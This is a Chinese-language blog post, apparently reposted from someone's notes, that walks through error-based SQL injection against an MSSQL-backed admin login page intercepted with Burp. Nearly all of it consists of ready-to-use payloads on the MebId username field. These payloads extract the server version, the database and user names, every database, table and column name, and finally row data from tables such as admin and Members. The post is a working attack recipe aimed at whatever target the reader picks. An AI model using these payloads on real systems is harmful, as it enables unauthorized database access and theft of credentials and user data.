标签:用户表 sele get 登录 nvarchar view data 如何 ase
后台登录页面开启代理把包送到Burp,然后send to Repeater
尝试:
MebId=admin‘ or 1=1;-- 提示密码错误,
MebId=admin‘ or 1=2;-- 提示用户名错误
用户名这里存在sql报错注入
【0】
首先爆版本: MebId=admin‘ and @@version>0;-- //@@SERVERNAME 是服务器名称
爆当前数据库名称: MebId=admin‘ and db_name()>0;--
当前用户: MebId=admin‘ and User_name()>0;-- //显示dbo很可能为dba权限
【1】
爆其他数据库:
MebId=admin‘ and (SELECT top 1 Name FROM Master..SysDatabases)>0;--
//得到回显:在将 nvarchar 值 ‘master‘ 转换成数据类型 int 时失败。
//根据回显,再爆数据库
MebId=admin‘ and (SELECT top 1 Name FROM Master..SysDatabases where name not in (‘master‘))>0;--
//以此类推,再爆出就接着 master 向后写
MebId=admin‘ and (SELECT top 1 Name FROM Master..SysDatabases where name not in (‘master‘,‘[新爆出的字段]‘))>0;--
//Master..SysDatabases 不是真是表而是view视图
【2】
爆表名,这里的表名是从上文中爆出的 数据库名字 中选择的:
MebId=admin‘ and (select top 1 NAME from [数据库名字].sys.all_objects where type=‘U‘ AND is_ms_shipped=0)>0;--
/* 这句话的意思的选取给定数据库中第一个表名
--XType=‘U‘:表示所有用户表;
--XType=‘S‘:表示所有系统表; */
得到第一张表名假如为test,爆其他表
MebId=admin‘ and (select top 1 NAME from [数据库名字].sys.all_objects where type=‘U‘ AND is_ms_shipped=0 and name not in (‘test‘))>0;--
//得到回显: 在将 nvarchar 值 ‘test1‘ 转换成数据类型 int 时失败
MebId=admin‘ and (select top 1 NAME from [数据库名字].sys.all_objects where type=‘U‘ AND is_ms_shipped=0 and name not in (‘test‘,‘test1‘))>0;--
【3】
爆字段名,思路和上面差不多,但是语法要变一下:
MebId=admin‘ and (select top 1 COLUMN_NAME from [选择一个有吸引力的数据库名].information_schema.columns where TABLE_NAME=‘[从上文选择一个有吸引力的表名]‘)>0;--
例如
MebId=admin‘ and (select top 1 COLUMN_NAME from manage.information_schema.columns where TABLE_NAME=‘admin‘)>0;--
得到回显字段: id 再爆其他字段
MebId=admin‘ and (select top 1 COLUMN_NAME from manage.information_schema.columns where TABLE_NAME=‘admin‘ and COLUMN_NAME not in(‘id‘))>0;--
同上类推
【4】
爆数据,好饿啊...
MebId=admin‘ and (select top 1 字段 from 表名)>0;--
//如何爆出第二条数据,额..
MebId=admin‘ and (select top 1 [选择的字段名] from Members where [选择的字段名] not in(‘[第一条爆出的数据]‘) )>0;--
抄袭自:一个码农的笔记
谢谢。
标签:用户表 sele get 登录 nvarchar view data 如何 ase
原文地址:http://www.cnblogs.com/thordlos/p/8012857.html
